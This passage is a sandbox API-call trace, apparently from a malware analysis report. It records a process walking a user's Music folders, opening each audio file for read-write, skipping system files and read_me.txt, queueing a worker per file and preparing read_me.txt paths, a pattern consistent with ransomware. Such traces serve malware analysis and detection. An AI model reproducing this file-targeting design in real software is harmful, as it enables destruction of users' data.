ftLastAccessTime.dwHighDateTime=0x1d4c67b, ftLastWriteTime.dwLowDateTime=0x6906d700, ftLastWriteTime.dwHighDateTime=0x1d4c67b, nFileSizeHigh=0x0, nFileSizeLow=0x15520, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="HQLOEn1NqpfTg1W.wav", cAlternateFileName="HQLOEN~1.WAV")) returned 1 [0076.191] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\HQLOEn1NqpfTg1W.wav") returned 108 [0076.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\HQLOEn1NqpfTg1W.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\a0ykgsoy8m31etq\\hqloen1nqpftg1w.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x974 [0076.191] StrStrW (lpFirst="hqloen1nqpftg1w.wav", lpSrch="read_me.txt") returned 0x0 [0076.191] StrStrW (lpFirst="hqloen1nqpftg1w.wav", lpSrch="autoexec.bat") returned 0x0 [0076.191] StrStrW (lpFirst="hqloen1nqpftg1w.wav", lpSrch="desktop.ini") returned 0x0 [0076.191] StrStrW (lpFirst="hqloen1nqpftg1w.wav", lpSrch="autorun.inf") returned 0x0 [0076.191] StrStrW (lpFirst="hqloen1nqpftg1w.wav", lpSrch="ntuser.dat") returned 0x0 [0076.191] StrStrW (lpFirst="hqloen1nqpftg1w.wav", lpSrch="iconcache.db") returned 0x0 [0076.191] StrStrW (lpFirst="hqloen1nqpftg1w.wav", lpSrch="bootsect.bak") returned 0x0 [0076.191] StrStrW (lpFirst="hqloen1nqpftg1w.wav", lpSrch="boot.ini") returned 0x0 [0076.192] StrStrW (lpFirst="hqloen1nqpftg1w.wav", lpSrch="ntuser.dat.log") returned 0x0 [0076.192] StrStrW (lpFirst="hqloen1nqpftg1w.wav", lpSrch="thumbs.db") returned 0x0 [0076.192] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 126 [0076.192] QueueUserWorkItem (Function=0x404e00, Context=0x974, Flags=0x0) returned 1 [0076.192] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x589e56c0, ftCreationTime.dwHighDateTime=0x1d4d2c1, ftLastAccessTime.dwLowDateTime=0xfb273750, ftLastAccessTime.dwHighDateTime=0x1d4d0e0, ftLastWriteTime.dwLowDateTime=0xfb273750, ftLastWriteTime.dwHighDateTime=0x1d4d0e0, nFileSizeHigh=0x0, nFileSizeLow=0x3ada, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="l6ln9j1_D55o.mp3", cAlternateFileName="L6LN9J~1.MP3")) returned 1 [0076.192] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\l6ln9j1_D55o.mp3") returned 105 [0076.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\l6ln9j1_D55o.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\a0ykgsoy8m31etq\\l6ln9j1_d55o.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x978 [0076.192] StrStrW (lpFirst="l6ln9j1_d55o.mp3", lpSrch="read_me.txt") returned 0x0 [0076.192] StrStrW (lpFirst="l6ln9j1_d55o.mp3", lpSrch="autoexec.bat") returned 0x0 [0076.192] StrStrW (lpFirst="l6ln9j1_d55o.mp3", lpSrch="desktop.ini") returned 0x0 [0076.192] StrStrW (lpFirst="l6ln9j1_d55o.mp3", lpSrch="autorun.inf") returned 0x0 [0076.192] StrStrW (lpFirst="l6ln9j1_d55o.mp3", lpSrch="ntuser.dat") returned 0x0 [0076.192] StrStrW (lpFirst="l6ln9j1_d55o.mp3", lpSrch="iconcache.db") returned 0x0 [0076.192] StrStrW (lpFirst="l6ln9j1_d55o.mp3", lpSrch="bootsect.bak") returned 0x0 [0076.192] StrStrW (lpFirst="l6ln9j1_d55o.mp3", lpSrch="boot.ini") returned 0x0 [0076.192] StrStrW (lpFirst="l6ln9j1_d55o.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0076.192] StrStrW (lpFirst="l6ln9j1_d55o.mp3", lpSrch="thumbs.db") returned 0x0 [0076.192] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 127 [0076.192] QueueUserWorkItem (Function=0x404e00, Context=0x978, Flags=0x0) returned 1 [0076.192] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45d7b110, ftCreationTime.dwHighDateTime=0x1d4d0f7, ftLastAccessTime.dwLowDateTime=0x27311c50, ftLastAccessTime.dwHighDateTime=0x1d4ca63, ftLastWriteTime.dwLowDateTime=0x27311c50, ftLastWriteTime.dwHighDateTime=0x1d4ca63, nFileSizeHigh=0x0, nFileSizeLow=0x9d60, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="Lzol.m4a", cAlternateFileName="")) returned 1 [0076.192] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\Lzol.m4a") returned 97 [0076.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\Lzol.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\a0ykgsoy8m31etq\\lzol.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x97c [0076.192] StrStrW (lpFirst="lzol.m4a", lpSrch="read_me.txt") returned 0x0 [0076.193] StrStrW (lpFirst="lzol.m4a", lpSrch="autoexec.bat") returned 0x0 [0076.193] StrStrW (lpFirst="lzol.m4a", lpSrch="desktop.ini") returned 0x0 [0076.193] StrStrW (lpFirst="lzol.m4a", lpSrch="autorun.inf") returned 0x0 [0076.193] StrStrW (lpFirst="lzol.m4a", lpSrch="ntuser.dat") returned 0x0 [0076.193] StrStrW (lpFirst="lzol.m4a", lpSrch="iconcache.db") returned 0x0 [0076.193] StrStrW (lpFirst="lzol.m4a", lpSrch="bootsect.bak") returned 0x0 [0076.193] StrStrW (lpFirst="lzol.m4a", lpSrch="boot.ini") returned 0x0 [0076.193] StrStrW (lpFirst="lzol.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0076.193] StrStrW (lpFirst="lzol.m4a", lpSrch="thumbs.db") returned 0x0 [0076.193] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 128 [0076.193] QueueUserWorkItem (Function=0x404e00, Context=0x97c, Flags=0x0) returned 1 [0076.193] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24b8e0c0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.193] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\read_me.txt") returned 100 [0076.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\a0ykgsoy8m31etq\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x980 [0076.193] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.193] CloseHandle (hObject=0x980) returned 1 [0076.193] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18683930, ftCreationTime.dwHighDateTime=0x1d4ced0, ftLastAccessTime.dwLowDateTime=0x7d543690, ftLastAccessTime.dwHighDateTime=0x1d4c63e, ftLastWriteTime.dwLowDateTime=0x7d543690, ftLastWriteTime.dwHighDateTime=0x1d4c63e, nFileSizeHigh=0x0, nFileSizeLow=0x188f4, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="ref_Ha9y0KFA_ID.m4a", cAlternateFileName="REF_HA~1.M4A")) returned 1 [0076.193] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\ref_Ha9y0KFA_ID.m4a") returned 108 [0076.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\ref_Ha9y0KFA_ID.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\a0ykgsoy8m31etq\\ref_ha9y0kfa_id.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x980 [0076.193] StrStrW (lpFirst="ref_ha9y0kfa_id.m4a", lpSrch="read_me.txt") returned 0x0 [0076.194] StrStrW (lpFirst="ref_ha9y0kfa_id.m4a", lpSrch="autoexec.bat") returned 0x0 [0076.194] StrStrW (lpFirst="ref_ha9y0kfa_id.m4a", lpSrch="desktop.ini") returned 0x0 [0076.194] StrStrW (lpFirst="ref_ha9y0kfa_id.m4a", lpSrch="autorun.inf") returned 0x0 [0076.194] StrStrW (lpFirst="ref_ha9y0kfa_id.m4a", lpSrch="ntuser.dat") returned 0x0 [0076.194] StrStrW (lpFirst="ref_ha9y0kfa_id.m4a", lpSrch="iconcache.db") returned 0x0 [0076.194] StrStrW (lpFirst="ref_ha9y0kfa_id.m4a", lpSrch="bootsect.bak") returned 0x0 [0076.194] StrStrW (lpFirst="ref_ha9y0kfa_id.m4a", lpSrch="boot.ini") returned 0x0 [0076.194] StrStrW (lpFirst="ref_ha9y0kfa_id.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0076.194] StrStrW (lpFirst="ref_ha9y0kfa_id.m4a", lpSrch="thumbs.db") returned 0x0 [0076.194] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 129 [0076.194] QueueUserWorkItem (Function=0x404e00, Context=0x980, Flags=0x0) returned 1 [0076.194] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18683930, ftCreationTime.dwHighDateTime=0x1d4ced0, ftLastAccessTime.dwLowDateTime=0x7d543690, ftLastAccessTime.dwHighDateTime=0x1d4c63e, ftLastWriteTime.dwLowDateTime=0x7d543690, ftLastWriteTime.dwHighDateTime=0x1d4c63e, nFileSizeHigh=0x0, nFileSizeLow=0x188f4, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="ref_ha9y0kfa_id.m4a", cAlternateFileName="REF_HA~1.M4A")) returned 0 [0076.194] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0076.194] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\read_me.txt") returned 100 [0076.194] GetProcessHeap () returned 0x4f10000 [0076.194] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d510b8 | out: hHeap=0x4f10000) returned 1 [0076.194] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 72 [0076.194] GetProcessHeap () returned 0x4f10000 [0076.194] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ad0070 | out: hHeap=0x4f10000) returned 1 [0076.211] GetProcessHeap () returned 0x4f10000 [0076.211] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d310a8 [0076.211] wnsprintfW (in: pszDest=0x8d310a8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\*") returned 88 [0076.211] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e8c3450, ftCreationTime.dwHighDateTime=0x1d4c791, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.212] wnsprintfW (in: pszDest=0x8d310a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\.") returned 88 [0076.212] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e8c3450, ftCreationTime.dwHighDateTime=0x1d4c791, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.212] wnsprintfW (in: pszDest=0x8d310a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\..") returned 89 [0076.212] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7ec3810, ftCreationTime.dwHighDateTime=0x1d4d151, ftLastAccessTime.dwLowDateTime=0x55f96730, ftLastAccessTime.dwHighDateTime=0x1d4d24d, ftLastWriteTime.dwLowDateTime=0x55f96730, ftLastWriteTime.dwHighDateTime=0x1d4d24d, nFileSizeHigh=0x0, nFileSizeLow=0x12ab5, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="gKB91HPUi4W1PdPGj.mp3", cAlternateFileName="GKB91H~1.MP3")) returned 1 [0076.212] wnsprintfW (in: pszDest=0x8d310a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\gKB91HPUi4W1PdPGj.mp3") returned 108 [0076.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\gKB91HPUi4W1PdPGj.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\c3erml5xqukjb\\gkb91hpui4w1pdpgj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x768 [0076.212] StrStrW (lpFirst="gkb91hpui4w1pdpgj.mp3", lpSrch="read_me.txt") returned 0x0 [0076.212] StrStrW (lpFirst="gkb91hpui4w1pdpgj.mp3", lpSrch="autoexec.bat") returned 0x0 [0076.212] StrStrW (lpFirst="gkb91hpui4w1pdpgj.mp3", lpSrch="desktop.ini") returned 0x0 [0076.212] StrStrW (lpFirst="gkb91hpui4w1pdpgj.mp3", lpSrch="autorun.inf") returned 0x0 [0076.212] StrStrW (lpFirst="gkb91hpui4w1pdpgj.mp3", lpSrch="ntuser.dat") returned 0x0 [0076.213] StrStrW (lpFirst="gkb91hpui4w1pdpgj.mp3", lpSrch="iconcache.db") returned 0x0 [0076.213] StrStrW (lpFirst="gkb91hpui4w1pdpgj.mp3", lpSrch="bootsect.bak") returned 0x0 [0076.213] StrStrW (lpFirst="gkb91hpui4w1pdpgj.mp3", lpSrch="boot.ini") returned 0x0 [0076.213] StrStrW (lpFirst="gkb91hpui4w1pdpgj.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0076.213] StrStrW (lpFirst="gkb91hpui4w1pdpgj.mp3", lpSrch="thumbs.db") returned 0x0 [0076.213] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 130 [0076.213] QueueUserWorkItem (Function=0x404e00, Context=0x768, Flags=0x0) returned 1 [0076.213] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24b8e0c0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.213] wnsprintfW (in: pszDest=0x8d310a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\read_me.txt") returned 98 [0076.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\c3erml5xqukjb\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x984 [0076.213] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.213] CloseHandle (hObject=0x984) returned 1 [0076.213] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24b8e0c0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.213] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.213] wnsprintfW (in: pszDest=0x8d310a8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\read_me.txt") returned 98 [0076.213] GetProcessHeap () returned 0x4f10000 [0076.213] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d310a8 | out: hHeap=0x4f10000) returned 1 [0076.213] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 73 [0076.213] GetProcessHeap () returned 0x4f10000 [0076.213] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d610c0 | out: hHeap=0x4f10000) returned 1 [0076.213] GetProcessHeap () returned 0x4f10000 [0076.213] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d610c0 [0076.213] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\*") returned 74 [0076.214] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15ae90, ftCreationTime.dwHighDateTime=0x1d4c681, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.214] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\.") returned 74 [0076.214] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15ae90, ftCreationTime.dwHighDateTime=0x1d4c681, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.214] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\..") returned 75 [0076.214] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4463b4d0, ftCreationTime.dwHighDateTime=0x1d4ca4b, ftLastAccessTime.dwLowDateTime=0x85556830, ftLastAccessTime.dwHighDateTime=0x1d4c8c0, ftLastWriteTime.dwLowDateTime=0x85556830, ftLastWriteTime.dwHighDateTime=0x1d4c8c0, nFileSizeHigh=0x0, nFileSizeLow=0x1179f, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="CbajF-WnH8JmAWUyb vs.m4a", cAlternateFileName="CBAJF-~1.M4A")) returned 1 [0076.214] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\CbajF-WnH8JmAWUyb vs.m4a") returned 97 [0076.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\CbajF-WnH8JmAWUyb vs.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\rd8rdpgmk_o u_ ro\\cbajf-wnh8jmawuyb vs.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x984 [0076.214] StrStrW (lpFirst="cbajf-wnh8jmawuyb vs.m4a", lpSrch="read_me.txt") returned 0x0 [0076.214] StrStrW (lpFirst="cbajf-wnh8jmawuyb vs.m4a", lpSrch="autoexec.bat") returned 0x0 [0076.214] StrStrW (lpFirst="cbajf-wnh8jmawuyb vs.m4a", lpSrch="desktop.ini") returned 0x0 [0076.214] StrStrW (lpFirst="cbajf-wnh8jmawuyb vs.m4a", lpSrch="autorun.inf") returned 0x0 [0076.214] StrStrW (lpFirst="cbajf-wnh8jmawuyb vs.m4a", lpSrch="ntuser.dat") returned 0x0 [0076.214] StrStrW (lpFirst="cbajf-wnh8jmawuyb vs.m4a", lpSrch="iconcache.db") returned 0x0 [0076.214] StrStrW (lpFirst="cbajf-wnh8jmawuyb vs.m4a", lpSrch="bootsect.bak") returned 0x0 [0076.214] StrStrW (lpFirst="cbajf-wnh8jmawuyb vs.m4a", lpSrch="boot.ini") returned 0x0 [0076.214] StrStrW (lpFirst="cbajf-wnh8jmawuyb vs.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0076.214] StrStrW (lpFirst="cbajf-wnh8jmawuyb vs.m4a", lpSrch="thumbs.db") returned 0x0 [0076.214] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 131 [0076.214] QueueUserWorkItem (Function=0x404e00, Context=0x984, Flags=0x0) returned 1 [0076.214] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f098cf0, ftCreationTime.dwHighDateTime=0x1d4d128, ftLastAccessTime.dwLowDateTime=0xc8e8f060, ftLastAccessTime.dwHighDateTime=0x1d4d5ab, ftLastWriteTime.dwLowDateTime=0xc8e8f060, ftLastWriteTime.dwHighDateTime=0x1d4d5ab, nFileSizeHigh=0x0, nFileSizeLow=0xef30, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="eUUW3K55SiLSEX.mp3", cAlternateFileName="EUUW3K~1.MP3")) returned 1 [0076.214] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\eUUW3K55SiLSEX.mp3") returned 91 [0076.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ 